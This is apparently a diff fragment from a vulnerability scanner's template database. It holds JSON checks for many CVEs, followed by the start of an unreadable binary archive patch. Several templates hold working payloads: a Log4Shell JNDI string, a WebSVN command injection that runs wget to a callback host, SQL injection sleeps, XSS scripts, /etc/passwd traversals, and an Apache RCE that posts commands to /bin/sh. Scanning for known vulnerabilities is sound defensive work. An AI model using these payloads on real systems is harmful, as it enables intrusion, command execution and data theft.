${jndi:ldap://127.0.0.1#.${hostName}.xorigin.{{interactsh-url}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]},{"type":"regex","group":1,"regex":["\\d{3}\\.\\d{1}\\.\\d{1}\\.\\d{1}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-46005","info":{"name":"Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nusername={{username}}&password={{password}}&login=\n","POST /admin/post-avehical.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicletitle\"\n\nTest\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"brandname\"\n\n1\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"vehicalorcview\"\n\n</script><script>alert(document.domain)</script>\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"priceperday\"\n\n500\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"fueltype\"\n\nPetrol\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"modelyear\"\n\n2022\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"seatingcapacity\"\n\n5\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img1\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img2\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img3\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img4\"; filename=\"test.png\"\nContent-Type: image/png\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"img5\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv\nContent-Disposition: form-data; name=\"submit\"\n\n\n------WebKitFormBoundarypWqYipqU21aYgccv--\n","GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-25028","info":{"name":"WordPress Event Tickets < 5.2.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24849","info":{"name":"WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"WCFM Marketplace - Best Multivendor Marketplace for WooCommerce\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{post_data}}\n"],"payloads":{"post_data":["action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--","action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/json\")","contains(body, \"success\")"],"condition":"and"}]}]},{"id":"CVE-2021-37304","info":{"name":"Jeecg Boot <= 2.4.5 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jeecg-boot/actuator/httptrace/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"traces\":[","\"headers\"","\"request\":{"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40970","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[username]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35250","info":{"name":"SolarWinds Serv-U 15.3 - Directory Traversal","severity":"high"},"requests":[{"raw":["POST /?Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n/?Command=NOOP\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27651","info":{"name":"Pega Infinity - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/prweb/PRAuth/app/default/"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.5.2', '>= 8.2.1')"]},{"type":"word","part":"body","words":["Pega Infinity"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"],"internal":true},{"type":"regex","group":1,"regex":["(?m)<span>Pega ([0-9.]+)</span>"]}]}]},{"id":"CVE-2021-28164","info":{"name":"Eclipse Jetty - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEB-INF/web.xml"],"matchers":[{"type":"dsl","internal":true,"dsl":["!contains_all(body, '</web-app>', 'java.sun.com')","!contains_all(header, 'application/xml')","status_code != 200","status_code != 404"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/%2e/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body, '</web-app>', 'java.sun.com')","contains_all(header, 'application/xml')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-25063","info":{"name":"WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>' type='hidden"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25099","info":{"name":"WordPress GiveWP <2.17.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=give_checkout_login&form_id=xxxxxx\"><script>alert(document.domain)</script>\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"give_user_login\")"],"condition":"and"}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25120","info":{"name":"Easy Social Feed < 6.2.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'type' : '</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24358","info":{"name":"Plus Addons for Elementor Page Builder < 4.1.10 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-42013","info":{"name":"Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n\n","POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\necho Content-Type: text/plain; echo; {{cmd}}\n\n"],"stop-at-first-match":true,"unsafe":true,"matchers-condition":"or","matchers":[{"type":"word","name":"RCE","words":["CVE-2021-42013"]},{"type":"regex","name":"LFI","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]}]}
\ No newline at end of file
diff --git a/db/db.tar.zst b/db/db.tar.zst
new file mode 100644
index 0000000000000000000000000000000000000000..1ef820a22374bbf92a1781aa75fed774d531d43a
GIT binary patch
literal 545173
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
